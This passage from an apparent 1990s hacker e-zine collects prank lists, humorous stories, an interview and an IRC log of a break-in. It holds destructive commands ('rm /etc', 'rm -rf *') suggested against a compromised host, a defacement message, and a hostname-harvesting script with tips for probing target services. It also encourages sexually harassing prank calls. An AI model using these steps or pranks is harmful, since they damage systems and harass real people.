something like archie -s a > hackedpws.k00l or archie -s . > HEY.YOU.STUPID.SYSADMIN. BLOW.ME (that is sure to get his attention).
If you are really bored, you can edit their .login to cat the file when
they login (this being archying < sp> a or . will probably give you a
few thousand file names and if the owner of the account can even login
(they havent checked user quotas yet obviously) so that they must wait
an hour for the thing to finish (but I'm not sure it never has for me
because i just telnet), it may just flood their com ports (or if you
have root, do archie -s a, archie -s ., archie -s (whatever you want to
to get a LOT of entries) > motd or >.login and make it so EVERY ONE
sees this when they login... unless they are on like a 2400... This is something to do when your bored... [ed note: do I notice a trend
forming?]
6. Go onto Irc, and into #hack and let ReDragon convince you to write an
article for some magazine (JUST ANY ARTICLE) .. and spend the next
(however much time I spend on th) writing an article filled with
strange and useless dribble because you are too lazy to do a real
article.. *WARNING* *WARNING* DO THIS IN ONLY EXTREME EMERGENCIES
*WARNING* *WARNING* [ed note: 6. go onto irc, randomly msg someone you
don't know to see just how lame an article someone who is not FEH can
write.]
7. Ftp to rs0.internic.net and retr all of the domain name lists. Spend
the next four or five hours reading the com.zon file and jack off to
the point of orgasm to it .. NO I AM NOT PATHETIC, YOU DO IT TO YOU
JUST REFUSE TO ADMIT TO IT. Do this all the time ... .this doesnt mean
your bored, you are just creative.
[ed note: you are just an idiot]
8. Call up the local noq and say things like
[ed note: I wish I knew what a noq was]
"Do you Deliver?"
"Yeah, I'll have a pair on rye, hold the mayo"
"Umm yes is this the roadkill cafe? I just hit some guy with a
Bell (or whatever your local telco is) Helmet and I think he would be
tasty charred"
"Hey baby what are you wearing?"
"Are you wet?"
"I've got a big phat pole ready for ya.. standing straight up
just for you"
Tape record them... turn them into .wavs or .aus and put them
on your home page... this is something to do when your bored or when
you are PATHETICALLY bored (YES I mean if your on a teleconference).
9. Hack your school's net and make i automatically go to modem doom
everytime someone clicks the left mouse button (hey its fun and it was
only ONE of the reasons I had a remark "DANGER TO COMPUTERS" in my
entry in my school's computer so it is pretty kosher
10. SPELL CHECK this fucking article because I'M NOT GOING TO.
11. If you have www access go to some of the following sites:
http://www.oceania.org | a brilliant scientific endeavor to
create a new, truely democratic society on a synthetically made island.
http://www.smallpenis.org | for those people afraid of being
less of man.. they have support groups AND penis pumps!!!!
http://www.wookie.net/l0ra | A ... home page (no comments ..
hehe)
http://www.something.org | A really cool site but I cant remember
the url so i wont put it here.. im sure you will find it
[ed note: 12 was too lame for even FEH to print]
13. Watch tv. Scary huh?
14. Irc and go to #netsex as ILLFUCKU. notice the channel that you want
some one for phone sex. see if you get kicked or invitations. heheh.
15. Read this file (you must be bored d00d).
[ed note: if you search for //, you will find the start of the next
article] 16. See how many of these things I type.
[ed note: hint, then answer is 18]
17. Add another to your count.(see previous item)
18. EOF
YEAH IT WAS LAME.. YEAH IT SUCKED.. YEAH IM TYPING IN ALL
CAPS.. SO WHAT?.. I WAS BORED... ARE YOU SATISFIED rEdRAGON???? ( :) )
[ed note: pretty much]
// 10. The Infamous Tack Story by Hotrod
The story you are about to hear, it has been determined, has been
spread by word of mouth to at least 5 states, and parts of Canada.
Whereever I go, people who I have never seen before ask me about the
tack story. I have no idea why this is the case - the story might have
been funny once, but I'm really rather sick of it. My friends (and
apparantly these people I don't know, who ask me about it) think this
story is the funniest thing they've ever heard. I think they are nuts.
The following story is 100% true.
Dramatis Personae:
Myself (Hotrod)
Chris, A friend
Zafir, An acquaintance
[ed note: is he the pan flute dude?]
The Setting:
Junior High School, Massachusetts.
Lunchtime, 8th grade
Ok, here goes. It was a normal lunchtime, really. I had gotten in
line to get the "Hot Lunch", which is the generic, "nutritionally
balanced" meal. On this fateful day, the hot lunch was manicotti with
meat sauce. A kid I knew, and had no reason to distrust, came up to me
while I was in line and offered to sell me his hot lunch, without the
milk. (Milk came with the hot lunch.) Of course, I'm thinking to
myself "This kid must be stupid. He wants to sell me his hot lunch,
which costs $1.30, for 50 cents, while keeping his milk, which he could
have bought for 35 cents by itself. [ed note: a savings of -45 cents]
I did know that this kid WAS stupid, however. So I bought the lunch
and went to sit where I always sat, next to my friend Chris. [ed note:
not erikb] For a few minutes, everything was fine. I was eating and
enjoying (as much as one can enjoy a school lunch, anyhow) my
manicotti. Keep in mind, that manicotti is soft, it's something like
lasagna. [ed note: i hope nobody from Italy is reading this] You
don't really chew it a whole lot, you just squish it around in your
mouth and swallow. Then it happened. I put the manicotti into my
mouth. [ed note: that's not the climax of the story, he in fact put
many pieces of manicotti in his mouth that day] I squished. I
swallowed. I grunted. I yelled. Something Sharp! Words that will live
in infamy in the minds of my friends. [ed note: the words
'huuhuhuhhuhu' also live in infamy to his friends] The dialogue went
like this: Me: [In a very hoarse voice] "Argh@!# Something Sharp!
Something sharp in my throat!"
Chris: "What?" [ed note: still not goggans]
Me: "Argh it kills!"
Chris: "What is it?" [ed note: this time it is erikb saying it]
Me: [Grabbing Chris' chocolate milk and taking a swig] "I can feel it
like grinding down my throat.. You know when you get like the sharp
corner of a Dorito or something? God it kills! It feels like a staple
or a tack or something!"
Chris: [Laughing a bit] "A tack? Zafir probably put a tack in it!"
[ed note: being a minor, Zafir was out of jail on his 18th birthday]
Anyhow, thats about it. It hurt going down. It never hurt again.
To the best of my knowledge, I have not shit out the 'tack'. No proof
has ever been found that there was a tack in my manicotti, [ed note:
manicotti in general should not hurt to swallow] although Chris swears
that he talked to Zafir, and Zafir admitted to it. I think Zafir has
since been deported. I hope so, anyhow. Should I ever shit the tack
out, it will be so noted in a future issue of FEH. [ed note: I have a
pencil end in my right shoulder]
// 11. The Birth of FEH by SnoCrash
So ReDragon /msg's me today. He goes "write the history of FEH befor
midnight tonight" (not in those exact words, and in all caps n stuph,
but you get the point).
fEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEh
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ThE HiStOrY Of FeH -- PaRt 1 <<ThE BeGiNnInG>>
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
(FuXiN' ElEeT HaXoRs)
A BeDtImE TaLe By Da MaStUr Of DiSaStUr:
SnOcRaSh
Okay, enough with this AlTeRnAtInG CaPs crap. It makes my head hurt.
[ed note: my feelings exactly]
(DISCLAIMER: FOR ALL YOU KNOW, NONE OF THIS COULD BE TRUE. I AM TRYING
TO REMEMBER WHAT HAPPENED AND MY MEMORY SUCKS AND I
EXAGGERATE SO DEAL WITH IT) Well, it all started for me about
a year ago. I was bored shitless as usual on a Sunday
morning, and was checking out <name witheld>.edu. I had an
IRC window open as well, as I almost always do. Here's the
log from that fateful day (re-formatted a bit to make it more
readable): [ed note: whenever monumental history takes place
on #hack, log it]
<SnoCrash> i found a system that still has the ftp -n bug!!!!!
<ReDragon> sunday afternoon is warez ftping days
[ed note: being as this was a sunday, ReD was probably still a bit
drunk] <SnoCrash> holy shit!!!
<SnoCrash> i feel sorry for the sysop
<SnoCrash> i'm gunna mail him and tell him
<SnoCrash> this is sad
<noxit> last root i haqued
<noxit> i left mail describing how to do it and how to fix it
<noxit> sad
<ReDragon> haha
<Okinawa> noxit; not me, I just rm /etc and let them figure it
out <SnoCrash> rm -rf *
<SnoCrash> ha
<SnoCrash> lame
<SnoCrash> well...
<SnoCrash> what should I do
<Okinawa> no, not /* but just /etc
<SnoCrash> im gunna change the banner explaining what to do
<Okinawa> Were all the configs are ;)
<ReDragon> if you dont rm the site, they will never learn how
dangerous hackers can be and the importance of securing their site
<SnoCrash> Oki: i know
<SnoCrash> and rm every user
<SnoCrash> there's only 10 users
<Okinawa> put in the l0ck motd
<oof> red: gimme warez
[ed note: note oof's critical role in FEH's inception]
<SnoCrash> they all have empty home dirs anyway
<Okinawa> put in a ILF motd
<SnoCrash> cept for the standard shell shit
<ReDragon> oof: whatcha want
<ReDragon> put in a FEH motd <-- the first public mention of
FEH <noxit> ln -s /vmunix /etc/motd
<rS-449> noxit: haha
<loq> oki: if you rm /etc, where are ya gonna put the ILF motd?
<Okinawa> is there a FEH motd?
<grayarea> donut put in an ilf motd :)
<oof> red: i dunno
<grayarea> use feh :)
<SnoCrash> yeah
<ReDragon> i will release an official FEH motd later today
<SnoCrash> feh
<Okinawa> loq: true
<SnoCrash> I'll make up a temp one now
<Okinawa> grayarea: why not?
<SnoCrash> **Hacked by a FEHWB**
<SnoCrash> ha
<grayarea> cuz they r in my new issue and if anything is done
in their name i will be visited
<loq> gray: dont you like being visited?
<loq> :)
<noxit> "visited"
<noxit> aliens of phedz?
<grayarea> and #hack has caused me more than enuf contact with
feds for the year already :)
<noxit> s/of/or
<grayarea> loq: i hear they come at dawn. ewwww
<grayarea> loq: i prefer evening appointments
<loq> heh
<SnoCrash> if I put up a FEH motd, can I be a FEH?
<loq> mine come at 11pm
<ReDragon> Sco: you already are in FEH you moron
<SnoCrash> oh yea
[ed note: i actually said Sco, not sno... but he never realized it]
So there it was. I was in FEH.
I made a temporary FEH /etc/motd, call it FEH motd version .0000001b.
Here is how it looked:
---------HI!!! WELCOME TO <name witheld>, NOW OWNED BY FEH----------
[TODAY'S NEWS]
Your system has been hacked by a member of FEH... Fuxin Eleet Haxors.
I am not particularly proud of this hack because it exploited an
extremely old bug that was patched many years ago. I have left a file
in the root directory called "how.to.fix.the.bugs.you.have" please read
it and follow the directions in it on how to fix the bugs you have. I
am very sure that your system has many bugs, judging from this and the
version of sendmail you are running. Thank you for your time...
--- Anonymous member of FEH who just fuxored up your system real bad
Not exactly beautiful, but it worked for the site it was placed on.
ReD then created the FEH motd versions 1.0 and 1.1, which is located in
this issue within the wopr hack.
[ed note: oof never got his warez, if you have any, please send him
some]
// 12. An Interview with Dale Drew by ReDragon
[ed note: good to my word, this is completely unedited for content, only
for formatting.]
ReD: will you do an interview for FEH issue #1?
d_d: I dont do interviews, sorry
ReD: just this once dale. only a few questions
ReD: its not like you've NEVER done an interview
ReD: dont even think of it as an interview, think of it as just
answering a few questions where the answers get published
d_d: haha.. and the difference is?
ReD: well, you dont do interviews. but maybe you do published question
and answer sessions.
ReD: so why dont you do interviews?
d_d: Youve got better things to do than interview me
ReD: when you let me interview you, you keep me out of trouble :)
ReD: so why dont you do interviews?
ReD: well
d_d: too many misquotes
ReD: pleez
ReD: i am not going to misquote you
ReD: so will you answer just a few questions for me
d_d: depends on the questions
ReD: are there any hackers that you particularly like or dislike?
d_d: No.
ReD: Do you think the people you are trying to bust care about
learning about the phone system or are they just trying to make free
phone calls?
d_d: There are to many LEGAL ways to learn about phone systems these
days to put up with fraud.
ReD: So do you think 10 or 20 years ago some phreaking may have been
justified in order to learn?
d_d: I never think that committing fraud is a justifiable way to learn
anything.
ReD: Does it cost your company anything when a person makes a free
phone call? d_d: Making use of a service illegally that would
otherwise be billed for certainly costs the company money
ReD: I understand there is a loss of income from the consumer since
they are not paying, but is there any expense to the phone company for
that call and if so can you estimate the cost?
d_d: I am not in phone fraud, so I wouldnt be able to estimate
ReD: So what is your job description?
d_d: Data Security
ReD: Can you expand on what that encompasses?
d_d: Later.. Ill be back
ReD: do you know when?
<d_d drops connection>
// 13. "Hacking Made Easy Using Scripts" by Seven Eleven
HacK1nG Mad3 EZ Uz1Ng Skr1PtZ Part I by Seven Eleven (
711@sec.de) =======================================
Welcome to our new column, dear reader.
In the software industry, everything is getting easier -
easier to use, easier to handle. The keywords are "Plug and Play",
the new WinDos 95 and "Don't think but drive (on the information superhighway)".
Now everyone can get on the Internet, your grandfather, your 4 year old
sister and even a coffee machine in Cambridge. There is no need to be
smart, no need to know anything about computers, and no need to have a
brain.
With more and more people on the net, more and more want to play
around and learn about other systems by getting into them, formerly
called "Hacking".
To make those tries possible, we are bringing you easy to use and
always working step by step instructions and scripts!
There are 3 major steps to succeed, which are similar to hitting
on a girl:
1) Get a list of all visible targets
2) Check if there is an easy way of scoring
3) Try gettin' into!
Today we will take a look at 1) and 2). 3) will follow in the next
issue.
Since all most newsbies know about is IRC, we will try to get a list
of visible targets through IRC!
Here is our great script:
------------------ cut here --------------------------- cut here
--------
# IRC Host Leecher 1.0 by Seven Eleven (
711@sec.de)
#
# This little one liner gets you all hosts that are currently on IRC
# and sorts the output nicely.
#
# This is especially nice if you plan to use our Host Checker.
#
#
# All you have to do is this:
#
# Start IRC
# /SET LOGFILE rawhosts
# /SET LOG ON
# /WHO **
# /SET LOG OFF
# /QUIT
# $ <Name_of_this_Script> rawhosts > outputfile
#
# Have Fun! :-)
#
#
#!/bin/sh
cat $1 | awk '{print $4}' | awk -F@ '{print $2}' | sort | uniq
------------ cut here --------------------- cut here
--------------------
Also try to use an old or modified server that won't kill you when you
list too many names! It used to be easier some months ago, but you
should still be lucky! After all, it's good if not too many Lamers get
as far as you, isn't it? :-)
If everything went fine, you have a wonderfully nice list of hostnames.
If you want to do it the elite way, try writing your own elite script, executing a command with each of the hostnames. Possibilities include:
- Check with rpcinfo -p which services are available.
Some might be vulnerable!
- One vulnerable daemon is mountd. Figure out yourself how to probe it!
(First Exercise!)
- Use ypx or ypsnarf to test their ypserver's security. If it's open,
either get in or --> social engineer the admin by telling him bugs
(lame!)
- Check with the 31337 SATAN!@# (available at a WaR3z near you!)
- Try some sendmail bugs.
If the above ways sound to hard for you, do it the easy way.
Social engineer the administrators!
- Sending mail to root@hostname requesting for an account
(Be prepared for many flames and your old account to be shut down)
If you should surprisingly be successful, drop me a mail and tell
me about your story! If not, stay tuned for the next issue of...
HacK1nG Mad3 EZ Uz1Ng Skr1PtZ!@#
// 14. How to Hack A Toaster Oven by bl0ke
HacKZoRiNG Ah ToaSTeR OOOHHVeNN)#(*%)(*% ========================================
Author:
bl0ke:#$%HS@#H:dat niggah bl0ke:/home/bl0ke:/bin/tcsh
(k)opywr0ngeded 1995
+--------------------------------------------------------------+
| [=ThiS iS THu DEFiNITiVE GuIDE TeW HAxORiNG A ToaSTER)#(%*=] | +--------------------------------------------------------------+ ****************************************************************
*******The Author of this text takes no responsibility for the**
*******actions that are performed on toaster ovens to try and***
*******obtain an access which the superuser does not want a ****
*******regular (l)user to have access to.***********************
*******The author also notes that this text is allowed only*****
*******to be used as a .motd after the site has been hax0red.*** ****************************************************************
^^^--------NoTiCE MuH DOpE K-RAD KiLLa AK-AkII SKeeiLLZ()*#$
/*
This text covers the basics of hacking the Proctor & Silex
MoDEL:0225 SERiES:b4588 TyPe:02
This specific toaster handels 120 Volts A.C. *ONLY* 1400 WATTS
*/
CoNNECTiNG:
-----------
When CoNNECTiNG TeW SuCH A ToaSTER On ThU iNeT YeW WiLL b ProMPtED
4 aH LoGiN AnD PaSSwErD. ex:(This is a capture of a login.)
+-------------------+
| PROCTOR & SILEX |
| M:0225 |
| S:b4588 |
| T:02 |
+-------------------+
LaHGiN:bageL-n-KreAM/CheZE
PaSSWeRD:*************************************
LaHGiNN GRaNTiD
***************
------------------------------------------------------------
P&S VeRSiON 666.9.MuRRY_LenDER(*REVISION*)
------------------------------------------------------------
login on tty[tOaST]
last login from BAGeL_BaKERY.COM on tty[ChEZe] at 6:43a.m.
:/etc/motd not found
1: OFF
2: ToAsT StART
3: BRoWN
4: BuRNT
5: LiGHT
6: UNiX TyPE SheLL ENViRONMEnT
If YeW GhET THiS YEW ArE COOL)(#*$ Ok NoW CHEwZe No. SiX. AND RuN NE
Of ThU 8LGMz. They WeRK. DeW NoT WeRRIE BoUT WhUT THU 8lgM SaYZ iT
WiLL STiLL WeRK oN ThIS SYSTEM. AlLLL THu 8LGMz DeW()#*%&( ThE OtHER
CoMMANDs R NoT ImPOrTaNT.
SoME NeaT-O ThINGS. YeW CaN TaP the /dev/ToaST-N-CheEZe. YeW CaN
FiND A FeW PRoGRAMs ThAT ArE GeWD FeR ThIS SuCH SYTeMM.
ftp:ftp.elite.warez.feh.OrG
/pub/hax0ring_WaReZ/ToAsteR_HaxoRiNG_WaREZ
P&S_ToAsTeR_ReWTKiT.TaR.GZ -RooTKiT FeR ThiS TYPE o ToaSTER PSNiFF.GZ -/dev/ToasT-N-CheEZe SniFFAH
SoME DeFUlTZ:
Login:Password
++++++++++++++
bageL-n-KreAM/CheZE:YuMMY
PoPALeNDER:STiNKY_Joo
POaCHeD_EGZ:HooKGNOZe
root:root
lpd:lpd
guest:hymienotyew
+======================================================================+
ThIS CoNCLuDES ThU DoPEST ARTiCLE On THu FACe O ThU PlaNET)(#*%)(*%
I WooD LiKE TeW GREaT:
Murray_L of the BagelBoyz o HymieTowN.
BuRnT-T of The BuRNT ToasT PoSSE.
AnD ReDRAGoN N ShIT.
PeSE OuT
And on that uplifting note, the first issue of FEH is complete....
Thanks for reading.
- FEH
--- Synchronet 3.22a-Linux NewsLink 1.2